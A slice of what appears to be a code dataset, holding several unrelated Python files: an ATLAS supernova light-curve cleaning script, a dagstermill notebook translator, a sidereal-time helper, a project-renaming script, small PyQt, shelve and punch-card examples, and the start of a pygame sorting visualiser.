calculate the 3σ-clipped average of any SN measurements falling within that bin and use that average as our flux for that bin. However, out of all exposures within this MJD bin, only measurements not cut in the previous methods are averaged in the 3σ-clipped average cut. 
(The exception to this statement would be the case that all 4 measurements are cut in previous methods; in this case, they are averaged anyway and flagged as a bad bin.)')\n\t\t\tf.write(f'\\n\\nThen we flag any measurements in the SN light curve for the given epoch for which statistics fulfill any of the following criteria with the hex value {hex(self.flags[\"avg_badday\"])}: ') \n\t\t\tf.write(f'\\n\\t- A returned chi-square > {self.g_x2_max}')\n\t\t\tf.write(f'\\n\\t- Number of measurements averaged < {self.g_Ngood_min}')\n\t\t\tf.write(f'\\n\\t- Number of measurements clipped > {self.g_Nclip_max}')\n\t\t\tf.write(f'\\n\\nThe averaged light curves are then saved in a new file with the MJD bin size added to the filename.')\n\t\t\tf.write(averaging_output)\n\n\t\treturn f\n\n\tdef get_lc_data(self, lc, snlist_index):\n\t\tif snlist_index == -1:\n\t\t\tlc.get_tns_data(self.tns_api_key, self.tns_id, self.bot_name)\n\n\t\t\t# add row to self.snlist\n\t\t\tself.snlist.newrow({'tnsname':lc.tnsname, \n\t\t\t\t\t\t\t\t'ra':lc.ra, \n\t\t\t\t\t\t\t\t'dec':lc.dec, \n\t\t\t\t\t\t\t\t'discovery_date':lc.discdate, \n\t\t\t\t\t\t\t\t'closebright_ra':np.nan, \n\t\t\t\t\t\t\t\t'closebright_dec':np.nan})\n\t\t\t\n\t\t\tsnlist_index = len(self.snlist.t) - 1\n\t\t\n\t\tlc.ra = self.snlist.t.loc[snlist_index,'ra']\n\t\tlc.dec = self.snlist.t.loc[snlist_index,'dec']\n\t\tlc.discdate = self.snlist.t.loc[snlist_index,'discovery_date']\n\t\tprint(f'RA: {lc.ra}, Dec: {lc.dec}, discovery date: {lc.discdate}')\n\n\t\treturn lc, snlist_index\n\n\tdef cut_loop(self):\n\t\targs = self.define_args().parse_args()\n\t\tself.load_settings(args)\n\n\t\tfor obj_index in range(0,len(args.tnsnames)):\n\t\t\tprint(f'\\nCOMMENCING LOOP FOR SN {args.tnsnames[obj_index]}')\n\n\t\t\tf = self.begin_readme(args, obj_index)\n\t\t\t\n\t\t\tif args.plot:\n\t\t\t\tplot = plot_atlas_lc(tnsname=args.tnsnames[obj_index], \n\t\t\t\t\t\t\t\t\t output_dir=self.output_dir, \n\t\t\t\t\t\t\t\t\t args=args, \n\t\t\t\t\t\t\t\t\t flags=self.flags)\n\t\t\tif self.detect_bumps:\n\t\t\t\tbumps_plot = plot_atlas_lc(tnsname=args.tnsnames[obj_index], \n\t\t\t\t\t\t\t\t\t\t output_dir=self.output_dir, \n\t\t\t\t\t\t\t\t\t\t args=args, \n\t\t\t\t\t\t\t\t\t\t add2filename='detect_bumps', \n\t\t\t\t\t\t\t\t\t\t flags=self.flags)\n\n\t\t\t# check if SN information exists in snlist.txt\n\t\t\tsnlist_index = -1\n\t\t\tsnlist_ix = self.snlist.ix_equal(colnames=['tnsname'],val=args.tnsnames[obj_index])\n\t\t\tif len(snlist_ix) > 0:\n\t\t\t\tif len(snlist_ix) > 1:\n\t\t\t\t\t# drop duplicate rows\n\t\t\t\t\tself.snlist.t.drop(snlist_ix[1:], inplace=True)\n\t\t\t\tsnlist_index = snlist_ix[0]\n\n\t\t\tfor filt in ['o','c']:\n\t\t\t\tprint(f'\\nFILTER SET: {filt}')\n\t\t\t\tlc = atlas_lc(tnsname=args.tnsnames[obj_index])\n\t\t\t\tlc.load(self.output_dir, filt, num_controls=self.num_controls)\n\n\t\t\t\tlc = self.verify_mjds(lc)\n\t\t\t\tif len(lc.lcs[0].t) < 1:\n\t\t\t\t\tprint('WARNING: Empty light curve--skipping any cuts/averaging/other...')\n\t\t\t\t\tcontinue\n\n\t\t\t\tlc, snlist_index = self.get_lc_data(lc, snlist_index)\n\t\t\t\tlc = self.drop_extra_columns(lc)\n\t\t\t\tlc, templates_output = self.correct_for_template(lc)\n\t\t\t\tif args.plot:\n\t\t\t\t\tplot.set(lc=lc, filt=filt)\n\t\t\t\t\tplot.plot_og_lc()\n\n\t\t\t\t# uncertainty cut\n\t\t\t\tuncertainty_output = None\n\t\t\t\tif self.uncertainties:\n\t\t\t\t\tlc, uncertainty_output = self.apply_uncertainty_cut(lc)\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tplot.plot_uncertainty_cut(add2title=f'at 
{self.uncertainty_cut:0.2f}')\n\n\t\t\t\t# estimate true uncertainties\n\t\t\t\testimate_true_uncertainties_output = None\n\t\t\t\tif self.estimate_true_uncertainties:\n\t\t\t\t\tlc, estimate_true_uncertainties_output, do_plot = self.apply_true_uncertainties(lc)\n\t\t\t\t\tif args.plot and do_plot:\n\t\t\t\t\t\tplot.plot_uncertainty_estimations()\n\n\t\t\t\t# add flux/dflux column\n\t\t\t\tprint('Adding uJy/duJy column to light curve...')\n\t\t\t\tlc.lcs[0].t['uJy/duJy'] = lc.lcs[0].t['uJy']/lc.lcs[0].t[lc.dflux_colnames[0]]\n\t\t\t\tlc.lcs[0].t = lc.lcs[0].t.replace([np.inf, -np.inf], np.nan)\n\n\t\t\t\t# chi-square cut\n\t\t\t\tchisquare_output = None\n\t\t\t\tfinal_cut = None\n\t\t\t\tif self.chisquares:\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tlc, final_cut, chisquare_output, plot = self.apply_chisquare_cut(args, lc, plot)\n\t\t\t\t\t\tplot.plot_chisquare_cut(add2title=f'at {final_cut:0.2f}')\n\t\t\t\t\telse:\n\t\t\t\t\t\tlc, final_cut, chisquare_output = self.apply_chisquare_cut(args, lc)\n\n\t\t\t\t# control light curve cut\n\t\t\t\tcontrol_output = None\n\t\t\t\tif self.controls:\n\t\t\t\t\tlc, control_output = self.apply_control_cut(lc)\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tplot.plot_controls_cut(self.num_controls)\n\n\t\t\t\tif args.plot and (self.chisquares or self.uncertainties or self.controls):\n\t\t\t\t\tplot.plot_all_cuts()\n\n\t\t\t\t# average and cut bad days\n\t\t\t\taveraging_output = None\n\t\t\t\tif self.averaging:\n\t\t\t\t\tavglc = atlas_lc(tnsname=lc.tnsname, is_averaged=True, mjd_bin_size=self.mjd_bin_size)\n\t\t\t\t\tavglc.discdate = lc.discdate\n\n\t\t\t\t\tlc, avglc, averaging_output = self.average(lc, avglc)\n\n\t\t\t\t\t# plot averaged light curve\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tplot.set(lc=avglc, filt=filt)\n\t\t\t\t\t\tplot.plot_averaged_lc()\n\n\t\t\t\t# detect pre-SN bumps \n\t\t\t\tif self.detect_bumps:\n\t\t\t\t\tprint('\\nNow detecting pre-SN bumps...')\n\n\t\t\t\t\tif not self.averaging:\n\t\t\t\t\t\traise RuntimeError('ERROR: Cannot detect pre-SN bumps without averaging! Please add -g to your command in order to average light curves.')\n\t\t\t\t\tif self.apply_to_controls and self.num_controls <= 0:\n\t\t\t\t\t\traise RuntimeError('ERROR: Cannot apply to control light curves without at least one control light curve! 
Check the num_controls field in config file.')\n\n\t\t\t\t\tif not(self.appmags is None):\n\t\t\t\t\t\tfor appmag in self.appmags:\n\t\t\t\t\t\t\tsimparams = {'sim_peakMJD':args.sim_gaussian[0],'sim_appmag':float(appmag),'sim_sigma_minus':float(args.sim_gaussian[2]),'sim_sigma_plus':float(args.sim_gaussian[2])}\n\t\t\t\t\t\t\tprint(f'# Simulation apparent magnitude: {simparams[\"sim_appmag\"]:0.2f} mag')\n\t\t\t\t\t\t\tprint(f'# Simulation peak MJD(s): {simparams[\"sim_peakMJD\"].split(\",\")}')\n\t\t\t\t\t\t\tprint(f'# Simulation gaussian sigma: {simparams[\"sim_sigma_plus\"]:0.2f} days')\n\n\t\t\t\t\t\t\tfor control_index in range(self.num_controls+1):\n\t\t\t\t\t\t\t\t# only add simulated gaussian(s) to SN light curve when applying rolling sum\n\t\t\t\t\t\t\t\tif control_index == 0:\n\t\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to SN light curve...')\n\t\t\t\t\t\t\t\t\tavglc = self.apply_gaussian(avglc, control_index=control_index, simparams=simparams)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to control light curve {control_index:03d}...')\n\t\t\t\t\t\t\t\t\tavglc = self.apply_gaussian(avglc, control_index=control_index)\n\n\t\t\t\t\t\t\tbumps_plot = plot_atlas_lc(tnsname=lc.tnsname, output_dir=self.output_dir, args=args, add2filename=f'detect_bumps.{filt}.appmag{simparams[\"sim_appmag\"]:0.2f}', flags=self.flags)\n\t\t\t\t\t\t\tbumps_plot.set(lc=avglc, filt=filt)\n\t\t\t\t\t\t\tbumps_plot.plot_sim_bumps(simparams=simparams)\n\t\t\t\t\t\t\tbumps_plot.plot_snr(simparams=simparams)\n\t\t\t\t\t\t\tif self.apply_to_controls:\n\t\t\t\t\t\t\t\tbumps_plot.plot_all_snr(simparams=simparams)\n\t\t\t\t\t\t\tbumps_plot.save()\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor control_index in range(self.num_controls+1):\n\t\t\t\t\t\t\tif control_index == 0:\n\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to SN light curve...')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to control light curve {control_index:03d}...')\n\t\t\t\t\t\t\tavglc = self.apply_gaussian(avglc, control_index=control_index, filt=filt)\n\n\t\t\t\t\t\tbumps_plot.set(lc=avglc, filt=filt)\n\t\t\t\t\t\tbumps_plot.plot_sim_bumps()\n\t\t\t\t\t\tbumps_plot.plot_snr()\n\t\t\t\t\t\tif self.apply_to_controls:\n\t\t\t\t\t\t\tbumps_plot.plot_all_snr()\n\n\t\t\t\t# drop extra control lc cut columns\n\t\t\t\tlc = self.drop_extra_columns(lc)\n\t\t\t\t# save lc with new 'Mask' column\n\t\t\t\tlc.save(self.output_dir, filt=filt, overwrite=self.overwrite)\n\n\n\t\t\t\t# drop extra columns in averaged lc\n\t\t\t\tif self.averaging:\n\t\t\t\t\tavglc = self.drop_extra_columns(avglc) \n\t\t\t\t\t# save averaged light curve\n\t\t\t\t\tavglc.save(self.output_dir, filt=filt, overwrite=self.overwrite, keep_empty_bins=self.keep_empty_bins)\n\n\t\t\t\tf = self.add_to_readme(f, lc, filt, final_cut=final_cut, \n\t\t\t\t\t\t\t\t\t\t\t\t\tuncertainty_output=uncertainty_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\testimate_true_uncertainties_output=estimate_true_uncertainties_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\ttemplates_output=templates_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\tchisquare_output=chisquare_output, \n\t\t\t\t\t\t\t\t\t\t\t\t\tcontrol_output=control_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\taveraging_output=averaging_output)\n\n\t\t\tf.close()\n\n\t\t\tif args.plot:\n\t\t\t\tplot.save()\n\t\t\tif self.detect_bumps and self.appmags is None:\n\t\t\t\tbumps_plot.save()\n\n\t\t# save snlist.txt with any new rows\n\t\tfilename = 
f'{self.output_dir}/{self.snlist_filename}'\n\t\tprint(f'Saving SN list at {filename}')\n\t\tself.snlist.write(filename)\n\nif __name__ == \"__main__\":\n\tclean_atlas_lc = clean_atlas_lc()\n\tclean_atlas_lc.cut_loop()\n","repo_name":"srest2021/atlaslc_jupyter","sub_path":"clean_atlas_lc.py","file_name":"clean_atlas_lc.py","file_ext":"py","file_size_in_byte":72641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9895045227","text":"import papermill\nimport papermill.translators\nfrom dagster import _seven\n\nRESERVED_INPUT_NAMES = [\n \"__dm_context\",\n \"__dm_dagstermill\",\n \"__dm_executable_dict\",\n \"__dm_json\",\n \"__dm_pipeline_run_dict\",\n \"__dm_node_handle_kwargs\",\n \"__dm_instance_ref_dict\",\n \"__dm_step_key\",\n \"__dm_input_names\",\n]\n\nINJECTED_BOILERPLATE = \"\"\"\n# Injected parameters\nfrom dagster import seven as __dm_seven\nimport dagstermill as __dm_dagstermill\ncontext = __dm_dagstermill._reconstitute_job_context(\n **{{\n key: __dm_seven.json.loads(value)\n for key, value\n in {job_context_args}.items()\n }}\n)\n\"\"\"\n\n\nclass DagsterTranslator(papermill.translators.PythonTranslator):\n @classmethod\n def codify(cls, parameters, comment=None):\n # comment is not used but is a required argument on newer versions of papermill\n assert \"__dm_context\" in parameters\n assert \"__dm_executable_dict\" in parameters\n assert \"__dm_pipeline_run_dict\" in parameters\n assert \"__dm_node_handle_kwargs\" in parameters\n assert \"__dm_instance_ref_dict\" in parameters\n assert \"__dm_step_key\" in parameters\n assert \"__dm_input_names\" in parameters\n\n context_args = parameters[\"__dm_context\"]\n job_context_args = dict(\n executable_dict=parameters[\"__dm_executable_dict\"],\n job_run_dict=parameters[\"__dm_pipeline_run_dict\"],\n node_handle_kwargs=parameters[\"__dm_node_handle_kwargs\"],\n instance_ref_dict=parameters[\"__dm_instance_ref_dict\"],\n step_key=parameters[\"__dm_step_key\"],\n **context_args,\n )\n\n for key in job_context_args:\n job_context_args[key] = _seven.json.dumps(job_context_args[key])\n\n content = INJECTED_BOILERPLATE.format(job_context_args=job_context_args)\n\n for input_name in parameters[\"__dm_input_names\"]:\n dm_load_input_call = f\"__dm_dagstermill._load_input_parameter('{input_name}')\"\n content += f\"{cls.assign(input_name, dm_load_input_call)}\\n\"\n\n return content\n\n\npapermill.translators.papermill_translators.register(\"python\", DagsterTranslator)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagstermill/dagstermill/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"4234489036","text":"##-------------------------------------------------------------------------\n## Sidereal Time\n##-------------------------------------------------------------------------\n# Author: Inaki Ordonez-Etxeberria\n#\n# Return the Sidereal Time (in hours) from Latitude and Longitude of the observatory, and date of observation. If the parameters are empty, the function assumes the position of the Isaac Newton Telescope in La Palma, at the moment of execution of the function. 
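\n# The function below relies on ephem and degrees; assuming pyephem and\n# math.degrees are the intended sources, these two imports make the snippet runnable.\nimport ephem\nfrom math import degrees\n\n# Minimal usage sketch (hypothetical; the value depends on the system clock):\n#   print(round(SiderealTime(), 4))  # local sidereal time at the INT right now, in hours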
\n\ndef SiderealTime(lat = '28.775867', lon = '-17.89733', date = 'now'):\n observatory = ephem.Observer()\n observatory.lon = lon\n observatory.lat = lat\n observatory.elevation = 2328\n if date == 'now':\n observatory.date = ephem.now()\n else:\n observatory.date = ephem.Date(date)\n return degrees(observatory.sidereal_time()) / 15\n","repo_name":"inakioe/SiderealTime","sub_path":"siderealtime.py","file_name":"siderealtime.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33627839334","text":"#!/usr/bin/env python3\n\"\"\"\n========================================\nRenameTEMPLATE_PyPROJECT - helper module\n========================================\n\nOverview\n========\nThis module helps to start a new Python project using: TEMPLATE_PyPROJECT\n\n#. Replaces all occurrences of ``TEMPLATE_PyPROJECT`` with ``NEW_PROJECT_NAME``\n#. Replaces all occurrences of ``template_pyproject`` with ``NEW_PROJECT_NAME lower case``\n#. Replaces all occurrences of ``TEMPLATE__OneLine_PyPROJECT_Description`` with ``NEW_PROJECT_ONE_LINE_DESCRIPTION``\n#. Renames all File which contain in their name: ``TEMPLATE_PyPROJECT`` with ``NEW_PROJECT_NAME``\n#. Renames all Folder/SubFolder with name: ``TEMPLATE_PyPROJECT`` with ``NEW_PROJECT_NAME``\n\nMust be removed from the project\n\"\"\"\nfrom os import (\n rename as os_rename,\n walk as os_walk,\n)\nfrom os.path import (\n basename as path_basename,\n dirname as path_dirname,\n isdir as path_isdir,\n join as path_join,\n)\n\n\n# ===========================================================================================================================\n# CONFIGURE - HERE\n# ===========================================================================================================================\n\n# Path to the ``TEMPLATE_PyPROJECT`` which should be renamed\nTEMPLATE_PyPROJECT_DIR_PATH = '/home/PycharmProjects/TEMPLATE_PyPROJECT'\n\n# New Project Name\nNEW_PROJECT_NAME = 'XXX'\n\n# New Project One Line Description: may not contain double quotes ``\"``\nNEW_PROJECT_ONE_LINE_DESCRIPTION = \"XXX Description\"\n\n# Any file to be skipped reading and replacing names: just the name: example: binary files like images\nSkipFileNames = [\n 'P-Projects32_32.ico',\n]\n\n# ===========================================================================================================================\n# END CONFIGURE\n# ===========================================================================================================================\n\n\n# check no \" double quote in: NEW_PROJECT_ONE_LINE_DESCRIPTION\nif '\"' in NEW_PROJECT_ONE_LINE_DESCRIPTION:\n print('''\n\n\n ATTENTION::::::The Specified NEW_PROJECT_ONE_LINE_DESCRIPTION may not contain double quotes <\">\n\n We got: NEW_PROJECT_ONE_LINE_DESCRIPTION:\n <{}>\n\n '''.format(NEW_PROJECT_ONE_LINE_DESCRIPTION))\n raise Exception\n\n\n\nNewProjectName__lower_case = NEW_PROJECT_NAME.lower()\nOrigTemplateName__lower_case = 'template_pyproject'\n\nOrigTemplateName = 'TEMPLATE_PyPROJECT'\n\nOrigTemplateOneLineDescription = 'TEMPLATE__OneLine_PyPROJECT_Description'\n\n# check that the TEMPLATE_PyPROJECT_DIR_PATH dir exist\nif not path_isdir(TEMPLATE_PyPROJECT_DIR_PATH):\n # noinspection PyPep8\n raise Exception('\\n\\n\\nATTENTION::::::The Specified TEMPLATE_PyPROJECT_DIR_PATH Dir does not exist:\\n<{}>\\n\\n'.format(TEMPLATE_PyPROJECT_DIR_PATH))\n\n\nDirList = []\nFileList = []\nfor root, dirs, files in 
os_walk(TEMPLATE_PyPROJECT_DIR_PATH, topdown=False):\n for dir_ in dirs:\n DirList.append((root, dir_))\n for file_ in files:\n FileList.append((root, file_))\n\n\n# FIRST: replace text in Files\nfor root, file_ in FileList:\n file_path = path_join(root, file_)\n # check SkipFileNames\n if path_basename(file_path) in SkipFileNames:\n continue\n with open(file_path, 'r') as file_p:\n file_content = file_p.read()\n\n if OrigTemplateName in file_content:\n file_content = file_content.replace(OrigTemplateName, NEW_PROJECT_NAME)\n\n if OrigTemplateName__lower_case in file_content:\n file_content = file_content.replace(OrigTemplateName__lower_case, NewProjectName__lower_case)\n\n if OrigTemplateOneLineDescription in file_content:\n file_content = file_content.replace(OrigTemplateOneLineDescription, NEW_PROJECT_ONE_LINE_DESCRIPTION)\n\n with open(file_path, 'w') as file_p:\n file_p.write(file_content)\n\n\n# SECOND: replace File Names\nfor root, file_name in FileList:\n if OrigTemplateName in file_name:\n new_file_name = file_name.replace(OrigTemplateName, NEW_PROJECT_NAME)\n os_rename(path_join(root, file_name), path_join(root, new_file_name))\n\n\n# THIRD: replace Dir Names\nfor root, dir_ in DirList:\n if dir_ == OrigTemplateName:\n os_rename(path_join(root, dir_), path_join(root, NEW_PROJECT_NAME))\n\n\n# FINALLY: rename the Root folder\nNewPathName = '{}/{}'.format(path_dirname(TEMPLATE_PyPROJECT_DIR_PATH), NEW_PROJECT_NAME)\nos_rename(TEMPLATE_PyPROJECT_DIR_PATH, NewPathName)\n\nprint('\\nFINISHED....\\n')\n","repo_name":"peter1000/TEMPLATE_PyPROJECT","sub_path":"RenameTEMPLATE_PyPROJECT.py","file_name":"RenameTEMPLATE_PyPROJECT.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36945389438","text":"from PyQt5.QtCore import Qt\r\nfrom PyQt5.QtGui import QPixmap\r\nfrom PyQt5.QtWidgets import QLabel\r\nfrom chessboard import chessboard\r\n\r\n\r\nclass chess(QLabel):\r\n def __init__(self, parent=None, color=None, size=None):\r\n super().__init__(parent)\r\n self.color = color\r\n if color == chessboard.BLACK:\r\n self.pixmap = QPixmap(\"image/black.png\")\r\n else:\r\n self.pixmap = QPixmap(\"image/white.png\")\r\n\r\n self.setPixmap(self.pixmap.scaled(\r\n size, size, Qt.KeepAspectRatio, Qt.SmoothTransformation))\r\n\r\n def resize_chess(self, size):\r\n self.resize(size, size)\r\n self.setPixmap(self.pixmap.scaled(\r\n size, size, Qt.KeepAspectRatio, Qt.SmoothTransformation))\r\n","repo_name":"milab-neuq/chess_gui","sub_path":"nogo_gui/chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30161941010","text":"import shelve\n# Shelves are databases files and their purpose is to aid in the memory\n# consumption. Less memory reserved. 
Values are pickled before stored.\n# Shelve keys MUST BE strings!!!\n\n# with shelve.open('ShelfTest') as fruit: # if we want to safely exit\nfruit = shelve.open('ShelfTest')\n# we can also define fruit as a dictionary immediately!\nfruit['orange'] = \"a sweet, orange, citrus fruit\"\nfruit['apple'] = \"good for making cider\"\nfruit['lemon'] = \"a sour, yellow citrus fruit\"\nfruit['grape'] = \"a small, sweet fruit growing in bunches\"\nfruit['lime'] = \"a sour, green citrus fruit\"\n\n# print(fruit[\"lemon\"])\n# print(fruit[\"grape\"])\n####\n# fruit[\"lime\"] = \"great with tequila\"\n#\n# for snack in fruit:\n# print(snack + \": \" + fruit[snack])\n\n# Checking and printing the dictionary contains:\n\n# while True:\n# dict_key = input(\"Please enter a fruit: \").lower()\n# if dict_key == \"quit\" or dict_key == \"q\":\n# break\n# # 2 ways to do it (get method):\n# # description = fruit.get(dict_key, 'Wrong entry: ' + dict_key)\n# # print(description)\n#\n# if dict_key in fruit:\n# description = fruit[dict_key]\n# print(description)\n# else:\n# print(\"We don't have a \" + dict_key)\n\n# Ordering the random ordered keys in the dictionary:\n\n# ordered_keys = list(fruit.keys())\n# ordered_keys.sort()\n#\n# for f in ordered_keys:\n# print(f + \" - \" + fruit[f])\n\n# Printing the values and the items in the database:\nfor v in fruit.values():\n print(v)\n\nprint(fruit.values())\n\nfor f in fruit.items():\n print(f)\n\nprint(fruit.items())\n\n\n# print(fruit) # not printing the entire dictionary entries!!!\nfruit.close() # needed if not using with to open file; manually close.\n\nprint(fruit)\n\n\n##########################\nprint()\n##########################\n\n\n# with shelve.open(\"bike\") as bike:\n# # bike[\"make\"] = \"Honda\"\n# # bike[\"model\"] = \"250 dream\"\n# # bike[\"colour\"] = \"red\"\n# # bike[\"engine_size\"] = 250\n#\n# # del bike['engin_size'] # Deleting from the database\n#\n# for key in bike:\n# print(key)\n#\n# print('=' * 40)\n#\n# print(bike[\"engine_size\"])\n# # print(bike[\"engin_size\"])\n# print(bike[\"colour\"])\n\n##############################\n########## IMPORTANT!!! 
###########\n# Every time we run the program, if the database file exists, it\n# will append the new entries and change the existing ones, rather\n# than erasing the entire database and creating a whole new one\n# from the beginning.\n\n##############################\n##############################\n\n\nblt = ["bacon", "lettuce", "tomato", "bread"]\nbeans_on_toast = ["beans", "bread"]\nscrambled_eggs = ["eggs", "butter", "milk"]\nsoup = ["tin of soup"]\npasta = ["pasta", "cheese"]\n\n# with shelve.open('recipes') as recipes:\nwith shelve.open('recipes', writeback=True) as recipes: # for writing\n# immediately, without using temp var.\n    recipes["blt"] = blt\n    recipes["beans on toast"] = beans_on_toast\n    recipes["scrambled eggs"] = scrambled_eggs\n    recipes["pasta" ] = pasta\n    recipes["soup"] = soup\n\n    # recipes["blt"].append("butter")\n    # recipes["pasta"].append("tomato")\n\n# The reason for using a temp var is shelve's functionality that tries to\n# minimise disk usage, so in-place changes are not written back by default.\n\n    # temp_list = recipes["blt"]\n    # temp_list.append("butter")\n    # recipes["blt"] = temp_list\n    #\n    # temp_list = recipes["pasta"]\n    # temp_list.append("tomato")\n    # recipes["pasta"] = temp_list\n\n# appending in place like this works only with writeback set to True\n    recipes["soup"].append("croutons")\n\n    # recipes["soup"] = soup\n    # recipes.sync() # forces the cache to unload, but also clears it.\n    # soup.append("cream")\n\n    for snack in recipes:\n        print(snack, recipes[snack])\n","repo_name":"nsotiriou88/Python","sub_path":"Training/Shelve Database.py","file_name":"Shelve Database.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"73492355688","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport sys\nfrom PIL import Image, ImageDraw\nimport zipfile\nimport configparser\n#Takes a card coordinate (R6.B22) and converts it to an x,y coordinate (51,11)\ndef coord2xy(coord):\n    assert coord[2]=='.'\n    if coord[0] in 'sS':\n        y=8\n    elif coord[0] in 'rR':\n        y=17\n    else:\n        raise ValueError(\"Row prefix must be [RS]\")\n    y-=int(coord[1])\n    if coord[3] in 'aA':\n        x=0\n    elif coord[3] in 'bB':\n        x=39\n    else:\n        raise ValueError(\"Column prefix must be [AB]\")\n    if coord[4] in 'aA':\n        x=30\n    elif coord[4] in 'bB':\n        x=38\n    else:\n        x+=int(coord[4])*5\n    x+=int(coord[5])\n    return x,y\n\n#Clears a punch (card coordinates)\ndef clearbit(coord):\n    global bits\n    x,y=coord2xy(coord)\n    print(\"Clearing\",x,y) \n    bits[y][x]=False\n\n#Sets a punch (card coordinates)\ndef setbit(coord):\n    global bits\n    x,y=coord2xy(coord)\n    print(\"Setting\",x,y) \n    bits[y][x]=True\n\n\nbits=[[False for x in range(69)] for y in range(18)]\n\n#Set the punches here\nfor bit in [ 'R0.A14','R0.A22','R0.A31','R0.A33','R0.A44','R0.A50','R0.A51',\n             'R1.A00','R1.A03','R1.A12','R1.A13','R1.A14','R1.A17','R1.A31','R1.A33','R1.A44','R1.A50',\n             'R6.A53',\n             'S1.A14',\n             'S2.A00','S2.A10','S2.A22',\n             'S3.A00','S3.A20',\n             'S7.A00','S7.A02',\n             'S8.A00','S8.A30','S8.A40','S8.A54']:\n    setbit(bit)\n\nfor bit in [ 'R0.B03','R0.B04','R0.B11','R0.B13','R0.B20','R0.B21','R0.B33','R0.B34','R0.B40','R0.B42','R0.B50','R0.B54',\n             'R5.B53',\n             'R6.B22','R6.B30',\n             'R7.B22','R7.B30',\n             'S0.B00',\n             'S7.B12','S7.B13',\n             'S8.B00','S8.B01','S8.B10','S8.B11','S8.A54']:\n    setbit(bit)\n\n#Got some good good ascii art\nsys.stdout.write('+'+('—'*69)+'+\\n')\nfor y in range(18):\n    sys.stdout.write('|')\n    for x in range(69): #nice\n        if 
x==31 or x==37:\n            sys.stdout.write('|')\n        elif x>31 and x<37:\n            sys.stdout.write(' ')\n        else:\n            sys.stdout.write('#' if bits[y][x] else '·')\n    sys.stdout.write('|\\n')\nsys.stdout.write('+'+('—'*69)+'+\\n')\n\nwith zipfile.ZipFile('cardpack.zip') as cardpack:\n    f_im=Image.open(cardpack.open('front.png'))\n    b_im=Image.open(cardpack.open('back.png'))\n    with cardpack.open('offsets.txt') as offsets:\n        config=configparser.ConfigParser()\n        config.read_string(offsets.read().decode('ASCII'))\n        print(config.sections())\n        f_origin_x=float(config['Front']['originX'])\n        f_origin_y=float(config['Front']['originY'])\n        f_offset_x=float(config['Front']['offsetX'])\n        f_offset_y=float(config['Front']['offsetY'])\n        b_origin_x=float(config['Back' ]['originX'])\n        b_origin_y=float(config['Back' ]['originY'])\n        b_offset_x=float(config['Back' ]['offsetX'])\n        b_offset_y=float(config['Back' ]['offsetY'])\n    \n\n    #Render the PNGs\n    f_draw = ImageDraw.Draw(f_im)\n    b_draw = ImageDraw.Draw(b_im)\n    for xidx in range(69):\n        for yidx in range(18):\n            if xidx>30 and xidx<38: continue\n            #Don't tell Professor Mead, these numbers are magic\n            f_xcen=f_origin_x+(xidx*f_offset_x)\n            f_ycen=f_origin_y+(yidx*f_offset_y)\n            b_xcen=b_origin_x+(xidx*b_offset_x)\n            b_ycen=b_origin_y+(yidx*b_offset_y)\n            #It's hole-punchin' time\n            if bits[yidx][xidx]:\n                f_draw.ellipse([(f_xcen-10,f_ycen-10),(f_xcen+10,f_ycen+10)],'black','black')\n                b_draw.ellipse([(b_xcen-10,b_ycen-10),(b_xcen+10,b_ycen+10)],'black','black')\n    f_im.save(\"front.png\")\n    b_im.save(\"back.png\")\n","repo_name":"chordtoll/troublemaker","sub_path":"cardpunch.py","file_name":"cardpunch.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"10113981743","text":"import json\n\n\ndef get_user_info(user_id: int, path: str):\n    \"\"\"\n    Adds the current user's data to the state machine's data\n    \"\"\"\n    name, sh_url, materials, building = None, None, None, None  # 'building' must start as None too, or the return below raises NameError when no match is found\n    with open(path, 'r', encoding=\"utf-8\") as file:\n        data = json.load(file)\n    for key, building_data in data.items():\n        users = building_data.get(\"users\", {})\n        if str(user_id) in users:\n            name = users.get(str(user_id))\n            sh_url = building_data.get(\"sh_url\", None)\n            materials = building_data.get(\"materials\", {})\n            building = key\n    return name, sh_url, materials, building\n\n","repo_name":"AmatorX/google_sheets_bot","sub_path":"utils/get_info_about_user.py","file_name":"get_info_about_user.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"71677059369","text":"import pygame, sys\nfrom random import randint, shuffle\nfrom time import sleep\n\n\nWIDTH = 800\nHEIGHT = 600\npygame.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREY = (128, 128, 128)\n\n\n# -------------------------- Quick Sort\ndef quick_sort(A, l, r):\n\tif l >= 